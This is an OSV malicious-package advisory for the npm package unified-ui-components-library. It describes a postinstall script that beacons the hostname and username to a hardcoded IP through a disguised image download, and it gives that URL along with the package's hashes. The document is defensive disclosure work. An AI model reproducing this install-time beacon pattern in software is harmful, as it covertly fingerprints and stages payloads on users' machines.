MAL-2026-5648

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/unified-ui-components-library/MAL-2026-5648.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5648
Published
2026-06-11T13:23:56Z
Modified
2026-06-11T13:46:36.006020678Z
Summary
Malicious code in unified-ui-components-library (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (78fe6900f4329c8e4c7bb5322f0e30a3f3b90e289c45852fca61c4fd16f43fd8)

On npm install, the package's postinstall.js collects os.hostname() and os.userInfo().username and embeds them as query-string parameters in a plaintext HTTP GET to a hardcoded bare IP (http://161.97.149.48/skybackground.png?display=<hostname>&profile=<username>). The fetch is dressed up as an 'image download' but the identifying data is in the URL the server logs, giving the operator a per-install fingerprint of every machine that installs the package. The download path also follows 301/302 redirects to attacker-chosen Locations and writes the server's response body to./downloaded-image.jpg with no content-type validation, providing staging infrastructure alongside the beacon. Cover-story signals corroborate intent: package.json describes an 'image downloader CLI' with placeholder author 'Your Name', README.md advertises an unrelated 'Simple Text Utils' API (capitalize/reverse/wordCount) that the code does not implement, and index.js exports only downloadImage. The advertised purpose, README, and shipped code disagree — the consistent behavior across all three is the install-time phone-home.

Database specific
{
    "malicious-packages-origins": [
        {
            "versions": [
                "10.0.3"
            ],
            "sha256": "5c2701b0b360af9ff8d06c12dcfaba8fbeff8840d1d7c56ce600a7ae8c5f1ffb",
            "modified_time": "2026-06-11T13:23:58Z",
            "source": "amazon-inspector",
            "import_time": "2026-06-11T13:27:21.388259152Z",
            "id": "IN-MAL-2026-005746"
        },
        {
            "versions": [
                "10.0.2"
            ],
            "sha256": "78fe6900f4329c8e4c7bb5322f0e30a3f3b90e289c45852fca61c4fd16f43fd8",
            "modified_time": "2026-06-11T13:24:02Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-005747",
            "import_time": "2026-06-11T13:27:21.417288346Z"
        },
        {
            "versions": [
                "10.0.1"
            ],
            "sha256": "baccf68297f0f532fddbf8186c16935ec20b3f30a749c5f0acdc5b0647567c76",
            "modified_time": "2026-06-11T13:23:56Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-005745",
            "import_time": "2026-06-11T13:27:21.301846096Z"
        }
    ]
}
References
Credits

Affected packages

npm / unified-ui-components-library

Package

Name
unified-ui-components-library
View open source insights on deps.dev
Purl
pkg:npm/unified-ui-components-library

Affected ranges

Affected versions

10.*
10.0.1
10.0.2
10.0.3

Database specific

indicators
{
    "package_integrity": [
        {
            "filename": "unified-ui-components-library-10.0.3.tgz",
            "hashes": {
                "sha512_sri": "sha512-aoAmrS8+YCBekWnvxVBddHf1O5gnZat0nVvnib06P9kN3Rzv+cJkyYVorhRAFDyL/EuK3JyW/t6PfvajUsqeBw==",
                "sha1": "6e133836325c29a1e602b5689462e58c1eb4bc11"
            }
        }
    ],
    "evidence_files": [
        {
            "sha256": "e2e4d144ce9269f1cbc6cc4d048d26acf573c258d4a656f61075635c9138e099",
            "path": "postinstall.js",
            "tlsh": "a251537519f351393237e0ad7f5b592ab2577403318dcb04358c71015fceaa486aa3bb"
        },
        {
            "sha256": "832350de287279bc69ad0e99185909518947f0f22a07f8526be86731552f4d22",
            "path": "package.json",
            "tlsh": "71e0ab1d89206e1335c80a982d5b190af25509470148bd0837e7006c0bae23f207e25f"
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/unified-ui-components-library/MAL-2026-5648.json"
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]